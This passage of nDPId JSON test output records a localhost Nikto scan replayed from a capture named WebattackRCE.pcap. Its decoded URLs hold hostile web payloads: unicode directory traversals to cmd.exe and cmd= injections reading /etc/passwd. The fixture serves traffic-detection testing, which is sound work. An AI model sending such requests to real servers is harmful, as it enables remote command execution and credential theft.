+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":734,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":734,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277877,"flow_last_seen":1576420277877,"flow_idle_time":7560000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277877,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51030,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00714{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":734,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":734,"flow_packet_id":1,"flow_last_seen":1576420277877,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1576420277877,"pkt":"AAAAAAAAAAAAAAAACABFAADl6fRAAEAGUhx\/AAABfwAAAcdWH5B7VdDQBDmQE4AYAED+2QAAAQEICp1m\/52dZv+dR0VUIC9zY3JpcHRzLy4uJWMwJWFmLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxOTYpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01099{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":734,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":734,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277877,"flow_last_seen":1576420277877,"flow_idle_time":7560000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277877,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51030,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003196)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":735,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277878,"flow_last_seen":1576420277878,"flow_idle_time":7560000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277878,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51032,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":735,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":735,"flow_packet_id":1,"flow_last_seen":1576420277878,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1576420277878,"pkt":"AAAAAAAAAAAAAAAACABFAADltn1AAEAGhZN\/AAABfwAAAcdYH5Dqro9H\/GjzZIAYAED+2QAAAQEICp1m\/56dZv+eR0VUIC9zY3JpcHRzLy4uJWMxJTFjLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxOTcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01099{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":735,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277878,"flow_last_seen":1576420277878,"flow_idle_time":7560000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277878,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51032,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%c1%1c..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003197)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":736,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277880,"flow_last_seen":1576420277880,"flow_idle_time":7560000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1576420277880,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51034,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00722{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":736,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":736,"flow_packet_id":1,"flow_last_seen":1576420277880,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":248,"pkt_l4_len":214,"thread_ts_msec":1576420277880,"pkt":"AAAAAAAAAAAAAAAACABFAADqdQ5AAEAGxv1\/AAABfwAAAcdaH5DlNEwz0kNZnYAYAED+3gAAAQEICp1m\/6CdZv+gR0VUIC9zY3JpcHRzLy4uJWMxJTFjLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIrYzpcIiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzE5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01106{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":736,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277880,"flow_last_seen":1576420277880,"flow_idle_time":7560000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1576420277880,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51034,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%c1%1c..\/winnt\/system32\/cmd.exe?\/c+dir+c:\\\"","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003198)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":737,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":737,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277882,"flow_last_seen":1576420277882,"flow_idle_time":7560000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277882,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51036,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00746{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":737,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":737,"flow_packet_id":1,"flow_last_seen":1576420277882,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":266,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":266,"pkt_l4_len":232,"thread_ts_msec":1576420277882,"pkt":"AAAAAAAAAAAAAAAACABFAAD8MthAAEAGCSJ\/AAABfwAAAcdcH5B7UwvpG4XAvoAYAED+8AAAAQEICp1m\/6GdZv+hR0VUIC9fdnRpX2Jpbi8uLiVjMCVhZi4uLy4uJWMwJWFmLi4vLi4lYzAlYWYuLi93aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzE5OSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01124{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":737,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":737,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277882,"flow_last_seen":1576420277882,"flow_idle_time":7560000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277882,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51036,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/_vti_bin\/..%c0%af..\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003199)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":738,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":738,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277883,"flow_last_seen":1576420277883,"flow_idle_time":7560000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277883,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51038,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":738,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":738,"flow_packet_id":1,"flow_last_seen":1576420277883,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":234,"pkt_l4_len":200,"thread_ts_msec":1576420277883,"pkt":"AAAAAAAAAAAAAAAACABFAADcUThAAEAG6uF\/AAABfwAAAcdeH5DOhWgJaQI1xYAYAED+0AAAAQEICp1m\/6OdZv+jR0VUIC9hZG1pbi9zeXN0ZW0ucGhwMz9jbWQ9Y2F0JTIwL2V0Yy9wYXNzd2QgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMyMTYpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01088{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":738,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":738,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277883,"flow_last_seen":1576420277883,"flow_idle_time":7560000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277883,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51038,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin\/system.php3?cmd=cat%20\/etc\/passwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003216)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":739,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277885,"flow_last_seen":1576420277885,"flow_idle_time":7560000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277885,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51040,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00695{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":739,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":739,"flow_packet_id":1,"flow_last_seen":1576420277885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":227,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":227,"pkt_l4_len":193,"thread_ts_msec":1576420277885,"pkt":"AAAAAAAAAAAAAAAACABFAADVkAVAAEAGrBt\/AAABfwAAAcdgH5ANV6k94mK\/lYAYAED+yQAAAQEICp1m\/6WdZv+lR0VUIC9hZG1pbi9zeXN0ZW0ucGhwMz9jbWQ9ZGlyJTIwYzpcXCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzIxNykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01081{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":739,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277885,"flow_last_seen":1576420277885,"flow_idle_time":7560000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277885,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51040,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin\/system.php3?cmd=dir%20c:\\\\","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003217)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":740,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":740,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277887,"flow_last_seen":1576420277887,"flow_idle_time":7560000,"flow_min_l4_payload_len":166,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":166,"midstream":1,"thread_ts_msec":1576420277887,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51042,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":740,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":740,"flow_packet_id":1,"flow_last_seen":1576420277887,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":232,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":232,"pkt_l4_len":198,"thread_ts_msec":1576420277887,"pkt":"AAAAAAAAAAAAAAAACABFAADawa5AAEAGem1\/AAABfwAAAcdiH5DPxPiU5alglIAYAED+zgAAAQEICp1m\/6edZv+nR0VUIC9hZG1pbi9leGVjLnBocDM\/Y21kPWNhdCUyMC9ldGMvcGFzc3dkIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMjE4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01086{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":740,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":740,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277887,"flow_last_seen":1576420277887,"flow_idle_time":7560000,"flow_min_l4_payload_len":166,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":166,"midstream":1,"thread_ts_msec":1576420277887,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51042,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin\/exec.php3?cmd=cat%20\/etc\/passwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003218)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":741,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277889,"flow_last_seen":1576420277889,"flow_idle_time":7560000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420277889,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51044,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00691{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":741,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":741,"flow_packet_id":1,"flow_last_seen":1576420277889,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":1576420277889,"pkt":"AAAAAAAAAAAAAAAACABFAADTtGFAAEAGh8F\/AAABfwAAAcdkH5BoGo0gUvgPHYAYAED+xwAAAQEICp1m\/6mdZv+pR0VUIC9hZG1pbi9leGVjLnBocDM\/Y21kPWRpciUyMGM6XFwgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMyMTkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01079{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":741,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277889,"flow_last_seen":1576420277889,"flow_idle_time":7560000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420277889,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51044,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin\/exec.php3?cmd=dir%20c:\\\\","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003219)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":742,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277890,"flow_last_seen":1576420277890,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277890,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51046,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":742,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":742,"flow_packet_id":1,"flow_last_seen":1576420277890,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277890,"pkt":"AAAAAAAAAAAAAAAACABFAADHrzRAAEAGjPp\/AAABfwAAAcdmH5C4mZZz5s98MYAYAED+uwAAAQEICp1m\/6qdZv+qR0VUIC9pc2FwaS90c3Rpc2FwaS5kbGwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzI2MykNCg0K"} +01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":742,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277890,"flow_last_seen":1576420277890,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277890,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51046,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/isapi\/tstisapi.dll","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003263)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":743,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":743,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277892,"flow_last_seen":1576420277892,"flow_idle_time":7560000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":1,"thread_ts_msec":1576420277892,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51048,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":743,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":743,"flow_packet_id":1,"flow_last_seen":1576420277892,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1576420277892,"pkt":"AAAAAAAAAAAAAAAACABFAADhOMJAAEAGA1N\/AAABfwAAAcdoH5DDTQGCjXG7iYAYAED+1QAAAQEICp1m\/6ydZv+sR0VUIC9jZXJ0c3J2Ly4uJTI1NWN3aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzI5NCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01094{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":743,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":743,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277892,"flow_last_seen":1576420277892,"flow_idle_time":7560000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":1,"thread_ts_msec":1576420277892,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51048,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/certsrv\/..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003294)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":744,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":744,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277893,"flow_last_seen":1576420277893,"flow_idle_time":7560000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"thread_ts_msec":1576420277893,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51050,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 